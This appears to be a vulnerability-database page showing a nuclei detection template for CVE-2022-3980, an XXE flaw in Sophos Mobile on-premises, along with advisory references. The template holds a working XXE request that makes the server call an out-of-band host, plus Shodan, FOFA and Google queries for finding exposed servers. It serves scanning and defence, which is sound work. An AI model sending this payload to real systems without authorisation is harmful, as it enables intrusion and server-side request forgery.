Lucene search
K

Sophos Mobile managed on-premises - XML External Entity Injection

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Sophos Mobile XXE Injection CVE-2022-398

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-3980
17 Nov 202215:52
circl
CNNVD
Sophos Mobile 代码问题漏洞
16 Nov 202200:00
cnnvd
CVE
CVE-2022-3980
16 Nov 202200:00
cve
Cvelist
CVE-2022-3980
16 Nov 202200:00
cvelist
NVD
CVE-2022-3980
16 Nov 202213:15
nvd
OSV
CVE-2022-3980
16 Nov 202213:15
osv
Prion
Server side request forgery (ssrf)
16 Nov 202213:15
prion
Positive Technologies
PT-2022-24997 · Sophos · Sophos Mobile
16 Nov 202200:00
ptsecurity
RedhatCVE
CVE-2022-3980
6 Feb 202500:45
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2022-3980
13 Nov 202300:00
vulncheck_kev
Rows per page
id: CVE-2022-3980

info:
  name: Sophos Mobile managed on-premises - XML External Entity Injection
  author: dabla
  severity: critical
  description: |
    An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.
  remediation: |
    Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability.
  reference:
    - https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3980
    - https://github.com/bigblackhat/oFx
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-3980
    cwe-id: CWE-611
    epss-score: 0.08087
    epss-percentile: 0.94099
    cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sophos
    product: mobile
    shodan-query:
      - http.favicon.hash:-1274798165
      - http.title:"sophos mobile"
    fofa-query:
      - title="Sophos Mobile"
      - icon_hash=-1274798165
      - title="sophos mobile"
    google-query: intitle:"sophos mobile"
  tags: cve,cve2022,xxe,ssrf,sophos,vkev,vuln

http:
  - raw:
      - |
        @timeout: 50s
        POST /servlets/OmaDsServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: "application/xml"

        <?xml version="1.0"?>
        <!DOCTYPE cdl [<!ENTITY % test SYSTEM "http://{{interactsh-url}}">%test;]>
        <cdl>test</cdl>

    redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
          - "status_code == 400"
          - "len(body) == 0"
        condition: and
# digest: 4a0a004730450220301809d413ab9b815526e4611f195492b5250646bb6a8d83807120fe9889c61a02210097fdb39e74fd8f0ee0919d0a03f8bfe7c777c2fd38b14005823e87903b4e7110:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.19.8
EPSS0.08087
SSVC
21